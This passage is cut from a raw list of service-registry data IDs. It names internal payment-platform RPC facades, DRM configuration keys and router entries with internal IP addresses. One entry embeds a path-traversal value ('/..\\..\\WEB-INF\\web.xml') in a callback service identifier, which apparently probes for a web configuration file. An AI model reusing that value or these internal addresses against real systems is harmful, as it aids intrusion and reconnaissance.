AULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.contentlib.common.service.facade.account.LifeAppQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.asyncOperationWaitSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/..\\..\\WEB-INF\\web.xml@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.core.api.HyCheckTaskRunService:1.0:DEMO_TOOL_GET_APP_INFO_MIF@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.kborderprod.KopOrderConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.biz.flow.service.isvorder.IsvQueryApplyInvoiceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.topic.isTopicDetailDowngradeContentRelated,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.igtransferprodTairCache.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:unitradeprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promodmp.service.facade.crowd.CrowdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.facade.api.SceneComponentRelationService:1.0:outer@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.workflow.service.facade.ProcessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.udataservice.client.RouteClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ross.service.facade.risktask.TaskOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.biz.event.stub.ServiceCallFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:reservecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityasset.common.service.facade.api.inner.OppositeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundbankcore.common.service.facade.FundBankQuickTransferFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.finaccenter.facade.api.CoaBizAccountingTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.service.facade.FlowOutService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iWFBizProdCommonCacheTBaseCache.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSasControlDrmResource.normalSuccessNotifyTimes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_S_CONSUMEX#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zscale.cluster.service.ChoiceUnitSourceForDimReceiverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.TransReceiverService:1.0:supergw.t380.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipaycore.common.service.facade.query.api.DepositQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finnet.service.facade.flux.spi.FinnetSimpleReceiveRService:1.0:instfluxcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopencore.common.service.interaction.facade.UserAnswerMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.69.213.189#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:commissionDetailDownloadCenterCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.RoleActionFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.248.106#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:merchantCertifyCallBackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.12.94#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instradeprod.common.service.inst.InsPolicyInstAcceptanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.124.112#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbinteligentpromo.common.service.facade.api.PlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmonitor.facade.iopenmonitor.admin.AdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.schedule.operation.sdk.com.facade.api.InstanceOperationApi:1.0:dpoperationplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.operator.OperatorServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ctu.service.manager.facade.CtuEventScriptManagerService:1.0:cnctutask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.120.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.6.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_ZHENGYUAN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.unirelease.common.service.facade.UniReleaseCheckFacade:1.0:workload@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.benetnasch.facade.api.ChangeEffectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.HumanToHumanDrmResource.alipassTempateId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pushcore.binding.BindManagementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:commonFcProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.extension.service.facade.api.EnterpriseConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.31.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.assettrans.core.service.drm.LogInterceptBlackListDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compcore.common.service.facade.ai.picture.PictureQualityAnalyseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.ExtendedContentCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.200.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.riskmodelcenter.biz.service.meta.query.reset.ProductLevelQueryService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipHvpsResource.pushSingleDetail,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.75.80#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbsales.common.service.facade.merchant.MerchantRelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.period,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fraudmng:name=com.alipay.zmodel.core.variables.conf.ModelVariableResource.useVarOrFeatureModelMapStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mwalletmng.biz.wealth.systemparam.SystemParamManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.bizprodmng.biz.shared.drm.impl.KbsearchDrmConfigImpl.metricsToken,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecashier.service.facade.spi.PaySettingMenuFacade:1.0:mobileic@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:insscenebff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.loanapi.certificate.LoanCertificationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.smartant.SmartAntArrangementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.RecoverService:1.0:supergw.d4885.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.materialcenter.common.service.facade.api.material.MaterialMetaManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.136#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securityexprod.biz.lisa.service.eworkcard.LisaUserInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.punish.AppPunishManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.cardcenter.facade.PCICacheFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zarcore:name=com.alipay.fc.arcore.migrate.localclient.config.lendMigratePdCodesConfigString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","io.sofastack.cafe.workflowx.sofarpc.facade.WorkflowxRPCInvocationFacade:1.0:SERVERLESS_PLAN_WF_ARK_INSTALL@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iopengw.service.facade.MessageParseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.integrationprod.common.service.facade.MigrationCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:PromoRecommend_recneptune@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_INDICATOR#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.client.SystemAppInvokeService:1.0:dcprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.cds.mng.SceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.punishcenter.common.service.facade.action.ActionService:1.0:amlDoraAlertServiceBean@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.182.127#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insttune.common.service.facade.backend.OverallService:1.0:dev@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcap_due_in_three_days_task@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bumng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_DMPSERVICE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.hrSercetNo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.125.11#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.echox.service.EchoxAopPlaybackService:1.0:unitradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.UserControlRightQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.signup.ClvUserBlackListQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.necquery.common.service.transaction.CustAcctTransListQueryNewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@minicenter#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:antfortuneall@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.192.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_C_EBPPRECON_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alibaba.dataphin.ide.application.tenant.IdeUserService:1.0:dpide@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:publichome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.period,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opencore.service.facade.pub.PublicResultManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reading.common.service.facade.game.SubDomainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:mdeduct@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.27.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.unimetaservice.facade.api.LynxConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.ws.WebServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.facade.api.test.CommonMessageService:1.0:instpayCommonMessageService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antpim.common.service.facade.productinfo.ProductProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:rest-with-auth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.application.service.flow.devoffline.QueryRequestOffline:1.0:testQueryRequestOffline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchstoreapp.common.service.facade.store.StoreAssetDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.cryptprod.common.service.client.api.CipherClientFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=midas.client.MidasClientStabilityDRMControl.needDiscoverFeatures,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insbffweb:name=com.alipay.insbffweb.chair.Config.carInfoReadyMaxIterTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clivecenter.common.service.facade.api.ClcAccessQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fcrcportal:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publiccore.common.service.facade.account.OfficialAccountQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aeicore.common.service.facade.EntrustAssetAccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilesearch.common.service.facade.spi.service.MobileSearchSpiService:1.0:appxsearch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.plugin:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mydds.core.engine.service.api.ValidationService:1.0:insmarketingcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.ReceiveIvrReceiptService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautoagent.common.insure.quote.AutoInsAgentQuoteFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_BP_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.39.193.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbasecore.service.piece.facade.PieceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.core.service.repository.CommoditiesOrderRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.xts.BenefitExchangeTwoPhasesService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iamlmatrix.common.service.facade.CmsVerifyReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cashier.service.api.BizTypeConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulemng.common.service.facade.template.RuleTemplateRelationService:1.0:promo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:finassistantcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.mybank.bkqafactory.facade.FluxInterfaceQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.166.137.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.prodquery.common.service.facade.standard.api.product.FinClientCacheServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.124.163#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:astrograph@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcloandecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zonemng.facade.api.GrayOpsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:oss-new@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cryptprod.common.service.facade.crypto.MacFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.bioperation.service.facade.trade.TradeCreateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphasec.compass.operating.facade.service.QualifyProcessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:lifemock@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.core.schduler.v2.resourcemanager.service.runtime.AppRuntimeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pucprod.common.service.facade.tmall.BillServiceFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.core.service.repository.CommoditiesLocalUserArrangementRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.drm.AstcSysParaUpdateDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.biz.service.account.monitor.CfpAccountMoniotrService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqualitywalleetoe.core.service.executor.SingleKeywordExecutor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkjusticecore_judicialProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfundprod.common.service.facade.test.FacadeTest:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fincommonbff:name=com.alipay.fincommonbff.drm.Switches.writeOldCrs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finallocationmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:custcpt@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.cfin.cfaccounting.facade.cut.AccountingDailyCutTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.mma.facade.api.CorpUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.218#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ordermng:name=com.alipay.zcache.tbase.revtransTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insclaiminvestcore.common.service.facade.service.job.UserJobQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.task.OrderMngTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_RDECLARECENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:scardcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exratecenter.common.service.client.drm.CacheRefreshDrmResourceInterface:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkcloudfunds.service.facade.depository.api.TradeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:postTradeExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fraudmng.common.service.facade.dataquality.api.DqEventInfoServiceForRone:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.product.ProductRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.application:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.demo.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.promokernel.common.service.facade.api.AppletTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SimpleService-16#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_10.15.254.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:externalPointExgCompensateTaskExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.InstOweInfoQueryCallbackFacade:1.0:pucprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.monitor.TairMonitorFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antlink.tuling.common.service.api.GraphQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.runtimedatasrcmng.common.service.facade.api.patrol.rule.PatrolAppRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mychain.dl.facade.PfFinSubjectQueryFacade:1.0:dev@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.160.176.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cloud.apfasmng.common.service.facade.appinstancegroupversion.AppInstanceGroupVersionFacade:1.0:default@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_REVMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pfunddts.service.dtm.service.CommonLindormService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmcscore.facade.ProductVersionFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.bstsolprod.instalment.facade.api.OrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.zcache.log.securitycap.logLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchcommons.mobilegw.proxy.trace.LtiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSasControlDrmResource.grayTurnOff,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.14.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","meshysale@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.130.233#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dsoc.service.facade.api.deployorder.DeployOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.zdal.ldc.tair.finfocoreCzoneTairCache_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.140.133#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.etetestcore.service.api.FundTaConfirmService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.service.CapUserService:1.0:antcloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.ModelLoaderCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.wkprod.common.service.facade.refund.RefundChargeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dceptrans.api.DceptransTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.shared.drm.PortfolioCoreSharedDrm.queryAssetStatusFromView,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finquotationcenter.common.service.facade.api.revise.FqcQuotationReviseFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:pcalbmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CERTIFY#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.mcard.api.MCardtransQueryFacde:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeco.facade.stresstestmng.bizservice.WorkSheetTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.ecomerchant.facade.attachment.admin.AttachmentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FixedData2SyncTable4CheckDrmImpl.selectSceneType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_C_INSASSET#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paycore.service.payment.api.StagedPaymentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.open.facade.OpenReplyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.arater.common.service.triple.RateWaitAlgoRank:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zscale.api.ZscaleCom